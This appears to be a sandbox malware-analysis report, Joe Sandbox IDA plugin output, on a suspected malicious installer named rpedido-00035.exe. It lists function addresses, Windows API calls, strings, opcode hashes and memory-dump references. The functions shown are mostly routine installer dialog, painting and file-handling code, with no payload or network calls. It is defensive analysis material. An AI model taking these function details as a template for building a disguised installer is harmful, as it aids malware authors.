                                                          • Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                          • Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
                                                          • Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
                                                          • Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          Function 00405FFC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                            • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                          • wsprintfA.USER32 ref: 0040607B
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                          • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                          • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                          • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                          Function 00406644 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rpedido-00035.exe",00403464,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3610635477
                                                          • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                          • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                          • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                          • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                          Function 004043AC Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                          • GetSysColor.USER32(00000000), ref: 004043E5
                                                          • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                          • SetBkMode.GDI32(?,?), ref: 004043FD
                                                          • GetSysColor.USER32(?), ref: 00404410
                                                          • SetBkColor.GDI32(?,?), ref: 00404420
                                                          • DeleteObject.GDI32(?), ref: 0040443A
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                          Function 00405414 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                          • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                          • lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                          • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                          • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                          • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                          Function 00402E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                          • GetTickCount.KERNEL32 ref: 00402EAB
                                                          • wsprintfW.USER32 ref: 00402ED9
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                            • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,00002903), ref: 00402E6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                          • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                          • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                          • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                          Function 00404CDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                          • GetMessagePos.USER32 ref: 00404D01
                                                          • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                          Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DB6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                          • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Tahoma
                                                          • API String ID: 3808545654-3580928618
                                                          • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                          • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                          • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                          • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                          Function 00402DD7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                          • wsprintfW.USER32 ref: 00402E29
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                          • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                          • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                          • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                          Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                          Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
